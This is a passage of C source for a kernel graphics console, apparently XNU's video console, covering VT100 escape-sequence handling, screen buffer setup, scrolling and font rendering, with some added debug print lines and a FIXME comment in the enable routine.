gc_relative_origin = 0; static int gc_charset_select = 0, gc_save_charset_s = 0; static int gc_charset[2] = { 0, 0 }; static int gc_charset_save[2] = { 0, 0 }; static void gc_clear_line(unsigned int xx, unsigned int yy, int which); static void gc_clear_screen(unsigned int xx, unsigned int yy, int top, unsigned int bottom, int which); static void gc_enable(boolean_t enable); static void gc_hide_cursor(unsigned int xx, unsigned int yy); static void gc_initialize(struct vc_info * info); static boolean_t gc_is_tab_stop(unsigned int column); static void gc_paint_char(unsigned int xx, unsigned int yy, unsigned char ch, int attrs); static void gc_putchar(char ch); static void gc_putc_askcmd(unsigned char ch); static void gc_putc_charsetcmd(int charset, unsigned char ch); static void gc_putc_charsizecmd(unsigned char ch); static void gc_putc_esc(unsigned char ch); static void gc_putc_getpars(unsigned char ch); static void gc_putc_gotpars(unsigned char ch); static void gc_putc_normal(unsigned char ch); static void gc_putc_square(unsigned char ch); static void gc_reset_screen(void); static void gc_reset_tabs(void); static void gc_reset_vt100(void); static void gc_scroll_down(int num, unsigned int top, unsigned int bottom); static void gc_scroll_up(int num, unsigned int top, unsigned int bottom); static void gc_set_tab_stop(unsigned int column, boolean_t enabled); static void gc_show_cursor(unsigned int xx, unsigned int yy); static void gc_update_color(int color, boolean_t fore); static void gc_clear_line(unsigned int xx, unsigned int yy, int which) { unsigned int start, end, i; /* * This routine runs extremely slowly. I don't think it's * used all that often, except for To end of line. I'll go * back and speed this up when I speed up the whole vc * module. --LK */ switch (which) { case 0: /* To end of line */ start = xx; end = vinfo.v_columns - 1; break; case 1: /* To start of line */ start = 0; end = xx; break; case 2: /* Whole line */ start = 0; end = vinfo.v_columns - 1; break; default: return; } for (i = start; i <= end; i++) { gc_paint_char(i, yy, ' ', ATTR_NONE); } } static void gc_clear_screen(unsigned int xx, unsigned int yy, int top, unsigned int bottom, int which) { if (!gc_buffer_size) { return; } if (xx < gc_buffer_columns && yy < gc_buffer_rows && bottom <= gc_buffer_rows) { uint32_t start, end; switch (which) { case 0: /* To end of screen */ start = (yy * gc_buffer_columns) + xx; end = (bottom * gc_buffer_columns) - 1; break; case 1: /* To start of screen */ start = (top * gc_buffer_columns); end = (yy * gc_buffer_columns) + xx; break; case 2: /* Whole screen */ start = (top * gc_buffer_columns); end = (bottom * gc_buffer_columns) - 1; break; default: start = 0; end = 0; break; } memset(gc_buffer_attributes + start, ATTR_NONE, end - start + 1); memset(gc_buffer_characters + start, ' ', end - start + 1); memset(gc_buffer_colorcodes + start, gc_color_code, end - start + 1); } gc_ops.clear_screen(xx, yy, top, bottom, which); } static void // FIXME: This always segfaults gc_enable( boolean_t enable ) { unsigned char *buffer_attributes = NULL; unsigned char *buffer_characters = NULL; unsigned char *buffer_colorcodes = NULL; unsigned char *buffer_tab_stops = NULL; uint32_t buffer_columns = 0; uint32_t buffer_rows = 0; uint32_t buffer_size = 0; spl_t s; if (enable == FALSE) { printf("[*] gc_enable(FALSE)\n"); // only disable console output if it goes to the graphics console if (console_is_serial() == FALSE) { disableConsoleOutput = TRUE; } gc_enabled = FALSE; gc_ops.enable(FALSE); } s = splhigh(); printf("[*] VCPUTC_LOCK_LOCK\n"); VCPUTC_LOCK_LOCK(); if (gc_buffer_size) { buffer_attributes = gc_buffer_attributes; buffer_characters = gc_buffer_characters; buffer_colorcodes = gc_buffer_colorcodes; buffer_tab_stops = gc_buffer_tab_stops; buffer_columns = gc_buffer_columns; buffer_rows = gc_buffer_rows; buffer_size = gc_buffer_size; gc_buffer_attributes = NULL; gc_buffer_characters = NULL; gc_buffer_colorcodes = NULL; gc_buffer_tab_stops = NULL; gc_buffer_columns = 0; gc_buffer_rows = 0; gc_buffer_size = 0; printf("[*] VCPUTC_LOCK_UNLOCK\n"); VCPUTC_LOCK_UNLOCK(); splx( s ); kheap_free( KHEAP_DATA_BUFFERS, buffer_attributes, buffer_size ); kheap_free( KHEAP_DATA_BUFFERS, buffer_characters, buffer_size ); kheap_free( KHEAP_DATA_BUFFERS, buffer_colorcodes, buffer_size ); kheap_free( KHEAP_DATA_BUFFERS, buffer_tab_stops, buffer_columns ); } else { printf("[*] VCPUTC_LOCK_UNLOCK\n"); VCPUTC_LOCK_UNLOCK(); splx( s ); } if (enable) { printf("[*] gc_enable(TRUE)\n"); if (vm_initialized) { printf("[*] buffer setup\n"); buffer_columns = vinfo.v_columns; buffer_rows = vinfo.v_rows; buffer_size = buffer_columns * buffer_rows; if (buffer_size) { printf("[*] moar buffer setup\n"); buffer_attributes = kheap_alloc( KHEAP_DATA_BUFFERS, buffer_size, Z_WAITOK ); buffer_characters = kheap_alloc( KHEAP_DATA_BUFFERS, buffer_size, Z_WAITOK ); buffer_colorcodes = kheap_alloc( KHEAP_DATA_BUFFERS, buffer_size, Z_WAITOK ); buffer_tab_stops = kheap_alloc( KHEAP_DATA_BUFFERS, buffer_columns, Z_WAITOK ); if (buffer_attributes == NULL || buffer_characters == NULL || buffer_colorcodes == NULL || buffer_tab_stops == NULL) { printf("[*] even moar buffer setup\n"); if (buffer_attributes) { kheap_free( KHEAP_DATA_BUFFERS, buffer_attributes, buffer_size ); } if (buffer_characters) { kheap_free( KHEAP_DATA_BUFFERS, buffer_characters, buffer_size ); } if (buffer_colorcodes) { kheap_free( KHEAP_DATA_BUFFERS, buffer_colorcodes, buffer_size ); } if (buffer_tab_stops) { kheap_free( KHEAP_DATA_BUFFERS, buffer_tab_stops, buffer_columns ); } buffer_attributes = NULL; buffer_characters = NULL; buffer_colorcodes = NULL; buffer_tab_stops = NULL; buffer_columns = 0; buffer_rows = 0; buffer_size = 0; } else { memset( buffer_attributes, ATTR_NONE, buffer_size ); memset( buffer_characters, ' ', buffer_size ); memset( buffer_colorcodes, COLOR_CODE_SET( 0, COLOR_FOREGROUND, TRUE ), buffer_size ); memset( buffer_tab_stops, 0, buffer_columns ); } } } s = splhigh(); printf("[*] VCPUTC_LOCK_LOCK\n"); VCPUTC_LOCK_LOCK(); gc_buffer_attributes = buffer_attributes; gc_buffer_characters = buffer_characters; gc_buffer_colorcodes = buffer_colorcodes; gc_buffer_tab_stops = buffer_tab_stops; gc_buffer_columns = buffer_columns; gc_buffer_rows = buffer_rows; gc_buffer_size = buffer_size; printf("[*] resetting screen\n"); gc_reset_screen(); printf("[*] VCPUTC_LOCK_UNLOCK\n"); VCPUTC_LOCK_UNLOCK(); splx( s ); printf("[*] clearing screen\n"); gc_ops.clear_screen(gc_x, gc_y, 0, vinfo.v_rows, 2); printf("[*] showing cursor at %d,%d\n", gc_x, gc_y); gc_ops.show_cursor(gc_x, gc_y); printf("[*] gc enable\n"); gc_ops.enable(TRUE); gc_enabled = TRUE; disableConsoleOutput = FALSE; printf("[*] gc_enable over and out.\n"); } } static void gc_hide_cursor(unsigned int xx, unsigned int yy) { if (xx < gc_buffer_columns && yy < gc_buffer_rows) { uint32_t index = (yy * gc_buffer_columns) + xx; unsigned char attribute = gc_buffer_attributes[index]; unsigned char character = gc_buffer_characters[index]; unsigned char colorcode = gc_buffer_colorcodes[index]; unsigned char colorcodesave = gc_color_code; gc_update_color(COLOR_CODE_GET(colorcode, TRUE ), TRUE ); gc_update_color(COLOR_CODE_GET(colorcode, FALSE), FALSE); gc_ops.paint_char(xx, yy, character, attribute, 0, 0); gc_update_color(COLOR_CODE_GET(colorcodesave, TRUE ), TRUE ); gc_update_color(COLOR_CODE_GET(colorcodesave, FALSE), FALSE); } else { gc_ops.hide_cursor(xx, yy); } } static void gc_initialize(struct vc_info * info) { if (gc_initialized == FALSE) { /* Init our lock */ VCPUTC_LOCK_INIT(); gc_initialized = TRUE; } gc_ops.initialize(info); gc_reset_vt100(); gc_x = gc_y = 0; } static void gc_paint_char(unsigned int xx, unsigned int yy, unsigned char ch, int attrs) { if (xx < gc_buffer_columns && yy < gc_buffer_rows) { uint32_t index = (yy * gc_buffer_columns) + xx; gc_buffer_attributes[index] = attrs; gc_buffer_characters[index] = ch; gc_buffer_colorcodes[index] = gc_color_code; } gc_ops.paint_char(xx, yy, ch, attrs, 0, 0); } static void gc_putchar(char ch) { if (!ch) { return; /* ignore null characters */ } switch (gc_vt100state) { default: gc_vt100state = ESnormal; OS_FALLTHROUGH; case ESnormal: gc_putc_normal(ch); break; case ESesc: gc_putc_esc(ch); break; case ESsquare: gc_putc_square(ch); break; case ESgetpars: gc_putc_getpars(ch); break; case ESgotpars: gc_putc_gotpars(ch); break; case ESask: gc_putc_askcmd(ch); break; case EScharsize: gc_putc_charsizecmd(ch); break; case ESsetG0: gc_putc_charsetcmd(0, ch); break; case ESsetG1: gc_putc_charsetcmd(1, ch); break; } if (gc_x >= vinfo.v_columns) { if (0 == vinfo.v_columns) { gc_x = 0; } else { gc_x = vinfo.v_columns - 1; } } if (gc_y >= vinfo.v_rows) { if (0 == vinfo.v_rows) { gc_y = 0; } else { gc_y = vinfo.v_rows - 1; } } } static void gc_putc_askcmd(unsigned char ch) { if (ch >= '0' && ch <= '9') { gc_par[gc_numpars] = (10 * gc_par[gc_numpars]) + (ch - '0'); return; } gc_vt100state = ESnormal; switch (gc_par[0]) { case 6: gc_relative_origin = ch == 'h'; break; case 7: /* wrap around mode h=1, l=0*/ gc_wrap_mode = ch == 'h'; break; default: break; } } static void gc_putc_charsetcmd(int charset, unsigned char ch) { gc_vt100state = ESnormal; switch (ch) { case 'A': case 'B': default: gc_charset[charset] = 0; break; case '0': /* Graphic characters */ case '2': gc_charset[charset] = 0x21; break; } } static void gc_putc_charsizecmd(unsigned char ch) { gc_vt100state = ESnormal; switch (ch) { case '3': case '4': case '5': case '6': break; case '8': /* fill 'E's */ { unsigned int xx, yy; for (yy = 0; yy < vinfo.v_rows; yy++) { for (xx = 0; xx < vinfo.v_columns; xx++) { gc_paint_char(xx, yy, 'E', ATTR_NONE); } } } break; } } static void gc_putc_esc(unsigned char ch) { gc_vt100state = ESnormal; switch (ch) { case '[': gc_vt100state = ESsquare; break; case 'c': /* Reset terminal */ gc_reset_vt100(); gc_clear_screen(gc_x, gc_y, 0, vinfo.v_rows, 2); gc_x = gc_y = 0; break; case 'D': /* Line feed */ case 'E': if (gc_y >= gc_scrreg_bottom - 1) { gc_scroll_up(1, gc_scrreg_top, gc_scrreg_bottom); gc_y = gc_scrreg_bottom - 1; } else { gc_y++; } if (ch == 'E') { gc_x = 0; } break; case 'H': /* Set tab stop */ gc_set_tab_stop(gc_x, TRUE); break; case 'M': /* Cursor up */ if (gc_y <= gc_scrreg_top) { gc_scroll_down(1, gc_scrreg_top, gc_scrreg_bottom); gc_y = gc_scrreg_top; } else { gc_y--; } break; case '>': gc_reset_vt100(); break; case '7': /* Save cursor */ gc_savex = gc_x; gc_savey = gc_y; gc_saveattr = gc_attr; gc_save_charset_s = gc_charset_select; gc_charset_save[0] = gc_charset[0]; gc_charset_save[1] = gc_charset[1]; break; case '8': /* Restore cursor */ gc_x = gc_savex; gc_y = gc_savey; gc_attr = gc_saveattr; gc_charset_select = gc_save_charset_s; gc_charset[0] = gc_charset_save[0]; gc_charset[1] = gc_charset_save[1]; break; case 'Z': /* return terminal ID */ break; case '#': /* change characters height */ gc_vt100state = EScharsize; break; case '(': gc_vt100state = ESsetG0; break; case ')': /* character set sequence */ gc_vt100state = ESsetG1; break; case '=': break; default: /* Rest not supported */ break; } } static void gc_putc_getpars(unsigned char ch) { if (ch == '?') { gc_vt100state = ESask; return; } if (ch == '[') { gc_vt100state = ESnormal; /* Not supported */ return; } if (ch == ';' && gc_numpars < MAXPARS - 1) { gc_numpars++; } else if (ch >= '0' && ch <= '9') { gc_par[gc_numpars] *= 10; gc_par[gc_numpars] += ch - '0'; } else { gc_numpars++; gc_vt100state = ESgotpars; gc_putc_gotpars(ch); } } static void gc_putc_gotpars(unsigned char ch) { unsigned int i; if (ch < ' ') { /* special case for vttest for handling cursor * movement in escape sequences */ gc_putc_normal(ch); gc_vt100state = ESgotpars; return; } gc_vt100state = ESnormal; switch (ch) { case 'A': /* Up */ gc_y -= gc_par[0] ? gc_par[0] : 1; if (gc_y < gc_scrreg_top) { gc_y = gc_scrreg_top; } break; case 'B': /* Down */ gc_y += gc_par[0] ? gc_par[0] : 1; if (gc_y >= gc_scrreg_bottom) { gc_y = gc_scrreg_bottom - 1; } break; case 'C': /* Right */ gc_x += gc_par[0] ? gc_par[0] : 1; if (gc_x >= vinfo.v_columns) { gc_x = vinfo.v_columns - 1; } break; case 'D': /* Left */ if (gc_par[0] > gc_x) { gc_x = 0; } else if (gc_par[0]) { gc_x -= gc_par[0]; } else if (gc_x) { --gc_x; } break; case 'H': /* Set cursor position */ case 'f': gc_x = gc_par[1] ? gc_par[1] - 1 : 0; gc_y = gc_par[0] ? gc_par[0] - 1 : 0; if (gc_relative_origin) { gc_y += gc_scrreg_top; } gc_hanging_cursor = 0; break; case 'X': /* clear p1 characters */ if (gc_numpars) { for (i = gc_x; i < gc_x + gc_par[0]; i++) { gc_paint_char(i, gc_y, ' ', ATTR_NONE); } } break; case 'J': /* Clear part of screen */ gc_clear_screen(gc_x, gc_y, 0, vinfo.v_rows, gc_par[0]); break; case 'K': /* Clear part of line */ gc_clear_line(gc_x, gc_y, gc_par[0]); break; case 'g': /* tab stops */ switch (gc_par[0]) { case 1: case 2: /* reset tab stops */ /* gc_reset_tabs(); */ break; case 3: /* Clear every tabs */ { for (i = 0; i <= vinfo.v_columns; i++) { gc_set_tab_stop(i, FALSE); } } break; case 0: gc_set_tab_stop(gc_x, FALSE); break; } break; case 'm': /* Set attribute */ for (i = 0; i < gc_numpars; i++) { switch (gc_par[i]) { case 0: gc_attr = ATTR_NONE; gc_update_color(COLOR_BACKGROUND, FALSE); gc_update_color(COLOR_FOREGROUND, TRUE ); break; case 1: gc_attr |= ATTR_BOLD; break; case 4: gc_attr |= ATTR_UNDER; break; case 7: gc_attr |= ATTR_REVERSE; break; case 22: gc_attr &= ~ATTR_BOLD; break; case 24: gc_attr &= ~ATTR_UNDER; break; case 27: gc_attr &= ~ATTR_REVERSE; break; case 5: case 25: /* blink/no blink */ break; default: if (gc_par[i] >= 30 && gc_par[i] <= 37) { gc_update_color(gc_par[i] - 30, TRUE); } if (gc_par[i] >= 40 && gc_par[i] <= 47) { gc_update_color(gc_par[i] - 40, FALSE); } break; } } break; case 'r': /* Set scroll region */ gc_x = gc_y = 0; /* ensure top < bottom, and both within limits */ if ((gc_numpars > 0) && (gc_par[0] < vinfo.v_rows)) { gc_scrreg_top = gc_par[0] ? gc_par[0] - 1 : 0; } else { gc_scrreg_top = 0; } if ((gc_numpars > 1) && (gc_par[1] <= vinfo.v_rows) && (gc_par[1] > gc_par[0])) { gc_scrreg_bottom = gc_par[1]; if (gc_scrreg_bottom > vinfo.v_rows) { gc_scrreg_bottom = vinfo.v_rows; } } else { gc_scrreg_bottom = vinfo.v_rows; } if (gc_relative_origin) { gc_y = gc_scrreg_top; } break; } } static void gc_putc_normal(unsigned char ch) { switch (ch) { case '\a': /* Beep */ break; case 127: /* Delete */ case '\b': /* Backspace */ if (gc_hanging_cursor) { gc_hanging_cursor = 0; } else if (gc_x > 0) { gc_x--; } break; case '\t': /* Tab */ if (gc_buffer_tab_stops) { while (gc_x < vinfo.v_columns && !gc_is_tab_stop(++gc_x)) { ; } } if (gc_x >= vinfo.v_columns) { gc_x = vinfo.v_columns - 1; } break; case 0x0b: case 0x0c: case '\n': /* Line feed */ if (gc_y >= gc_scrreg_bottom - 1) { gc_scroll_up(1, gc_scrreg_top, gc_scrreg_bottom); gc_y = gc_scrreg_bottom - 1; } else { gc_y++; } break; case '\r': /* Carriage return */ gc_x = 0; gc_hanging_cursor = 0; break; case 0x0e: /* Select G1 charset (Control-N) */ gc_charset_select = 1; break; case 0x0f: /* Select G0 charset (Control-O) */ gc_charset_select = 0; break; case 0x18: /* CAN : cancel */ case 0x1A: /* like cancel */ /* well, i do nothing here, may be later */ break; case '\033': /* Escape */ gc_vt100state = ESesc; gc_hanging_cursor = 0; break; default: if (ch >= ' ') { if (gc_hanging_cursor) { gc_x = 0; if (gc_y >= gc_scrreg_bottom - 1) { gc_scroll_up(1, gc_scrreg_top, gc_scrreg_bottom); gc_y = gc_scrreg_bottom - 1; } else { gc_y++; } gc_hanging_cursor = 0; } gc_paint_char(gc_x, gc_y, (ch >= 0x60 && ch <= 0x7f) ? ch + gc_charset[gc_charset_select] : ch, gc_attr); if (gc_x == vinfo.v_columns - 1) { gc_hanging_cursor = gc_wrap_mode; } else { gc_x++; } } break; } } static void gc_putc_square(unsigned char ch) { int i; for (i = 0; i < MAXPARS; i++) { gc_par[i] = 0; } gc_numpars = 0; gc_vt100state = ESgetpars; gc_putc_getpars(ch); } static void gc_reset_screen(void) { printf("[*] gc_reset_screen\n"); gc_reset_vt100(); gc_x = gc_y = 0; printf("[√] screen reset\n"); } static void gc_reset_tabs(void) { unsigned int i; if (!gc_buffer_tab_stops) { return; } for (i = 0; i < vinfo.v_columns; i++) { gc_buffer_tab_stops[i] = ((i % 8) == 0); } } static void gc_set_tab_stop(unsigned int column, boolean_t enabled) { if (gc_buffer_tab_stops && (column < vinfo.v_columns)) { gc_buffer_tab_stops[column] = enabled; } } static boolean_t gc_is_tab_stop(unsigned int column) { if (gc_buffer_tab_stops == NULL) { return (column % 8) == 0; } if (column < vinfo.v_columns) { return gc_buffer_tab_stops[column]; } else { return FALSE; } } static void gc_reset_vt100(void) { gc_reset_tabs(); gc_scrreg_top = 0; gc_scrreg_bottom = vinfo.v_rows; gc_attr = ATTR_NONE; gc_charset[0] = gc_charset[1] = 0; gc_charset_select = 0; gc_wrap_mode = 1; gc_relative_origin = 0; gc_update_color(COLOR_BACKGROUND, FALSE); gc_update_color(COLOR_FOREGROUND, TRUE); } static void gc_scroll_down(int num, unsigned int top, unsigned int bottom) { if (!gc_buffer_size) { return; } if (bottom <= gc_buffer_rows) { unsigned char colorcodesave = gc_color_code; uint32_t column, row; uint32_t index, jump; jump = num * gc_buffer_columns; for (row = bottom - 1; row >= top + num; row--) { index = row * gc_buffer_columns; for (column = 0; column < gc_buffer_columns; index++, column++) { if (gc_buffer_attributes[index] != gc_buffer_attributes[index - jump] || gc_buffer_characters[index] != gc_buffer_characters[index - jump] || gc_buffer_colorcodes[index] != gc_buffer_colorcodes[index - jump]) { if (gc_color_code != gc_buffer_colorcodes[index - jump]) { gc_update_color(COLOR_CODE_GET(gc_buffer_colorcodes[index - jump], TRUE ), TRUE ); gc_update_color(COLOR_CODE_GET(gc_buffer_colorcodes[index - jump], FALSE), FALSE); } if (gc_buffer_colorcodes[index] != gc_buffer_colorcodes[index - jump]) { gc_ops.paint_char( /* xx */ column, /* yy */ row, /* ch */ gc_buffer_characters[index - jump], /* attrs */ gc_buffer_attributes[index - jump], /* ch_previous */ 0, /* attrs_previous */ 0 ); } else { gc_ops.paint_char( /* xx */ column, /* yy */ row, /* ch */ gc_buffer_characters[index - jump], /* attrs */ gc_buffer_attributes[index - jump], /* ch_previous */ gc_buffer_characters[index], /* attrs_previous */ gc_buffer_attributes[index] ); } gc_buffer_attributes[index] = gc_buffer_attributes[index - jump]; gc_buffer_characters[index] = gc_buffer_characters[index - jump]; gc_buffer_colorcodes[index] = gc_buffer_colorcodes[index - jump]; } } } if (colorcodesave != gc_color_code) { gc_update_color(COLOR_CODE_GET(colorcodesave, TRUE ), TRUE ); gc_update_color(COLOR_CODE_GET(colorcodesave, FALSE), FALSE); } /* Now set the freed up lines to the background colour */ for (row = top; row < top + num; row++) { index = row * gc_buffer_columns; for (column = 0; column < gc_buffer_columns; index++, column++) { if (gc_buffer_attributes[index] != ATTR_NONE || gc_buffer_characters[index] != ' ' || gc_buffer_colorcodes[index] != gc_color_code) { if (gc_buffer_colorcodes[index] != gc_color_code) { gc_ops.paint_char( /* xx */ column, /* yy */ row, /* ch */ ' ', /* attrs */ ATTR_NONE, /* ch_previous */ 0, /* attrs_previous */ 0 ); } else { gc_ops.paint_char( /* xx */ column, /* yy */ row, /* ch */ ' ', /* attrs */ ATTR_NONE, /* ch_previous */ gc_buffer_characters[index], /* attrs_previous */ gc_buffer_attributes[index] ); } gc_buffer_attributes[index] = ATTR_NONE; gc_buffer_characters[index] = ' '; gc_buffer_colorcodes[index] = gc_color_code; } } } } else { gc_ops.scroll_down(num, top, bottom); /* Now set the freed up lines to the background colour */ gc_clear_screen(vinfo.v_columns - 1, top + num - 1, top, bottom, 1); } } static void gc_scroll_up(int num, unsigned int top, unsigned int bottom) { if (!gc_buffer_size) { return; } if (bottom <= gc_buffer_rows) { unsigned char colorcodesave = gc_color_code; uint32_t column, row; uint32_t index, jump; jump = num * gc_buffer_columns; for (row = top; row < bottom - num; row++) { index = row * gc_buffer_columns; for (column = 0; column < gc_buffer_columns; index++, column++) { if (gc_buffer_attributes[index] != gc_buffer_attributes[index + jump] || gc_buffer_characters[index] != gc_buffer_characters[index + jump] || gc_buffer_colorcodes[index] != gc_buffer_colorcodes[index + jump]) { if (gc_color_code != gc_buffer_colorcodes[index + jump]) { gc_update_color(COLOR_CODE_GET(gc_buffer_colorcodes[index + jump], TRUE ), TRUE ); gc_update_color(COLOR_CODE_GET(gc_buffer_colorcodes[index + jump], FALSE), FALSE); } if (gc_buffer_colorcodes[index] != gc_buffer_colorcodes[index + jump]) { gc_ops.paint_char( /* xx */ column, /* yy */ row, /* ch */ gc_buffer_characters[index + jump], /* attrs */ gc_buffer_attributes[index + jump], /* ch_previous */ 0, /* attrs_previous */ 0 ); } else { gc_ops.paint_char( /* xx */ column, /* yy */ row, /* ch */ gc_buffer_characters[index + jump], /* attrs */ gc_buffer_attributes[index + jump], /* ch_previous */ gc_buffer_characters[index], /* attrs_previous */ gc_buffer_attributes[index] ); } gc_buffer_attributes[index] = gc_buffer_attributes[index + jump]; gc_buffer_characters[index] = gc_buffer_characters[index + jump]; gc_buffer_colorcodes[index] = gc_buffer_colorcodes[index + jump]; } } } if (colorcodesave != gc_color_code) { gc_update_color(COLOR_CODE_GET(colorcodesave, TRUE ), TRUE ); gc_update_color(COLOR_CODE_GET(colorcodesave, FALSE), FALSE); } /* Now set the freed up lines to the background colour */ for (row = bottom - num; row < bottom; row++) { index = row * gc_buffer_columns; for (column = 0; column < gc_buffer_columns; index++, column++) { if (gc_buffer_attributes[index] != ATTR_NONE || gc_buffer_characters[index] != ' ' || gc_buffer_colorcodes[index] != gc_color_code) { if (gc_buffer_colorcodes[index] != gc_color_code) { gc_ops.paint_char( /* xx */ column, /* yy */ row, /* ch */ ' ', /* attrs */ ATTR_NONE, /* ch_previous */ 0, /* attrs_previous */ 0 ); } else { gc_ops.paint_char( /* xx */ column, /* yy */ row, /* ch */ ' ', /* attrs */ ATTR_NONE, /* ch_previous */ gc_buffer_characters[index], /* attrs_previous */ gc_buffer_attributes[index] ); } gc_buffer_attributes[index] = ATTR_NONE; gc_buffer_characters[index] = ' '; gc_buffer_colorcodes[index] = gc_color_code; } } } } else { gc_ops.scroll_up(num, top, bottom); /* Now set the freed up lines to the background colour */ gc_clear_screen(0, bottom - num, top, bottom, 0); } } static void gc_show_cursor(unsigned int xx, unsigned int yy) { if (xx < gc_buffer_columns && yy < gc_buffer_rows) { uint32_t index = (yy * gc_buffer_columns) + xx; unsigned char attribute = gc_buffer_attributes[index]; unsigned char character = gc_buffer_characters[index]; unsigned char colorcode = gc_buffer_colorcodes[index]; unsigned char colorcodesave = gc_color_code; gc_update_color(COLOR_CODE_GET(colorcode, FALSE), TRUE ); gc_update_color(COLOR_CODE_GET(colorcode, TRUE ), FALSE); gc_ops.paint_char(xx, yy, character, attribute, 0, 0); gc_update_color(COLOR_CODE_GET(colorcodesave, TRUE ), TRUE ); gc_update_color(COLOR_CODE_GET(colorcodesave, FALSE), FALSE); } else { gc_ops.show_cursor(xx, yy); } } static void gc_update_color(int color, boolean_t fore) { assert(gc_ops.update_color); gc_color_code = COLOR_CODE_SET(gc_color_code, color, fore); gc_ops.update_color(color, fore); } void vcputc(__unused int l, __unused int u, int c) { if (gc_initialized && gc_enabled) { VCPUTC_LOCK_LOCK(); if (gc_enabled) { gc_hide_cursor(gc_x, gc_y); gc_putchar(c); gc_show_cursor(gc_x, gc_y); } VCPUTC_LOCK_UNLOCK(); } } /* * Video Console (Back-End) * ------------------------ */ /* * For the color support (Michel Pollet) */ static unsigned char vc_color_index_table[33] = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 2 }; static uint32_t vc_colors[8][4] = { { 0xFFFFFFFF, 0x00000000, 0x00000000, 0x00000000 }, /* black */ { 0x23232323, 0x7C007C00, 0x00FF0000, 0x3FF00000 }, /* red */ { 0xb9b9b9b9, 0x03e003e0, 0x0000FF00, 0x000FFC00 }, /* green */ { 0x05050505, 0x7FE07FE0, 0x00FFFF00, 0x3FFFFC00 }, /* yellow */ { 0xd2d2d2d2, 0x001f001f, 0x000000FF, 0x000003FF }, /* blue */ // { 0x80808080, 0x31933193, 0x00666699, 0x00000000 }, /* blue */ { 0x18181818, 0x7C1F7C1F, 0x00FF00FF, 0x3FF003FF }, /* magenta */ { 0xb4b4b4b4, 0x03FF03FF, 0x0000FFFF, 0x000FFFFF }, /* cyan */ { 0x00000000, 0x7FFF7FFF, 0x00FFFFFF, 0x3FFFFFFF } /* white */ }; static uint32_t vc_color_fore = 0; static uint32_t vc_color_back = 0; /* * New Rendering code from Michel Pollet */ /* Rendered Font Buffer */ static unsigned char *vc_rendered_font = NULL; /* Rendered Font Size */ static uint32_t vc_rendered_font_size = 0; /* Size of a character in the table (bytes) */ static int vc_rendered_char_size = 0; #define REN_MAX_DEPTH 32 static unsigned char vc_rendered_char[ISO_CHAR_HEIGHT * ((REN_MAX_DEPTH / 8) * ISO_CHAR_WIDTH)]; #if defined(XNU_TARGET_OS_OSX) #define CONFIG_VC_PROGRESS_METER_SUPPORT 1 #endif /* XNU_TARGET_OS_OSX */ #if defined(XNU_TARGET_OS_OSX) static void internal_set_progressmeter(int new_value); static void internal_enable_progressmeter(int new_value); enum{ kProgressMeterOff = FALSE, kProgressMeterUser = TRUE, kProgressMeterKernel = 3, }; enum{ kProgressMeterMax = 1024, kProgressMeterEnd = 512, }; #endif /* defined(XNU_TARGET_OS_OSX) */ static boolean_t vc_progress_white = #ifdef CONFIG_VC_PROGRESS_WHITE TRUE; #else /* !CONFIG_VC_PROGRESS_WHITE */ FALSE; #endif /* !CONFIG_VC_PROGRESS_WHITE */ static int vc_acquire_delay = kProgressAcquireDelay; static void vc_clear_screen(unsigned int xx, unsigned int yy, unsigned int scrreg_top, unsigned int scrreg_bottom, int which) { uint32_t *p, *endp, *row; int linelongs, col; int rowline, rowlongs; if (!vinfo.v_depth) { return; } linelongs = vinfo.v_rowbytes * (ISO_CHAR_HEIGHT >> 2); rowline = vinfo.v_rowscanbytes >> 2; rowlongs = vinfo.v_rowbytes >> 2; p = (uint32_t*) vinfo.v_baseaddr; endp = (uint32_t*) vinfo.v_baseaddr; switch (which) { case 0: /* To end of screen */ gc_clear_line(xx, yy, 0); if (yy < scrreg_bottom - 1) { p += (yy + 1) * linelongs; endp += scrreg_bottom * linelongs; } break; case 1: /* To start of screen */ gc_clear_line(xx, yy, 1); if (yy > scrreg_top) { p += scrreg_top * linelongs; endp += yy * linelongs; } break; case 2: /* Whole screen */ p += scrreg_top * linelongs; if (scrreg_bottom == vinfo.v_rows) { endp += rowlongs * vinfo.v_height; } else { endp += scrreg_bottom * linelongs; } break; } for (row = p; row < endp; row += rowlongs) { for (col = 0; col < rowline; col++) { *(row + col) = vc_color_back; } } } static void vc_render_char(unsigned char ch, unsigned char *renderptr, short newdepth) { union { unsigned char *charptr; unsigned short *shortptr; uint32_t *longptr; } current; /* current place in rendered font, multiple types. */ unsigned char *theChar; /* current char in iso_font */ int line; current.charptr = renderptr; theChar = iso_font + (ch * ISO_CHAR_HEIGHT); for (line = 0; line < ISO_CHAR_HEIGHT; line++) { unsigned char mask = 1; do { switch (newdepth) { case 8: *current.charptr++ = (*theChar & mask) ? 0xFF : 0; break; case 16: *current.shortptr++ = (*theChar & mask) ? 0xFFFF : 0; break; case 30: case 32: *current.longptr++ = (*theChar & mask) ? 0xFFFFFFFF : 0; break; } mask <<= 1; } while (mask); /* while the single bit drops to the right */ theChar++; } } static void vc_paint_char_8(unsigned int xx, unsigned int yy, unsigned char ch, int attrs, __unused unsigned char ch_previous, __unused int attrs_previous) { uint32_t *theChar; uint32_t *where; int i; if (vc_rendered_font) { theChar = (uint32_t*)(vc_rendered_font + (ch * vc_rendered_char_size)); } else { vc_render_char(ch, vc_rendered_char, 8); theChar = (uint32_t*)(vc_rendered_char); } where = (uint32_t*)(vinfo.v_baseaddr + (yy * ISO_CHAR_HEIGHT * vinfo.v_rowbytes) + (xx * ISO_CHAR_WIDTH)); if (!attrs) { for (i = 0; i < ISO_CHAR_HEIGHT; i++) { /* No attr? FLY !*/ uint32_t *store = where; int x; for (x = 0; x < 2; x++) { uint32_t val = *theChar++; val = (vc_color_back & ~val) | (vc_color_fore & val); *store++ = val; } where = (uint32_t*)(((unsigned char*)where) + vinfo.v_rowbytes); } } else { for (i = 0; i < ISO_CHAR_HEIGHT; i++) { /* a little slower */ uint32_t *store = where, lastpixel = 0; int x; for (x = 0; x < 2; x++) { uint32_t val = *theChar++, save = val; if (attrs & ATTR_BOLD) { /* bold support */ if (lastpixel && !(save & 0xFF000000)) { val |= 0xff000000; } if ((save & 0xFFFF0000) == 0xFF000000) { val |= 0x00FF0000; } if ((save & 0x00FFFF00) == 0x00FF0000) { val |= 0x0000FF00; } if ((save & 0x0000FFFF) == 0x0000FF00) { val |= 0x000000FF; } } if (attrs & ATTR_REVERSE) { val = ~val; } if 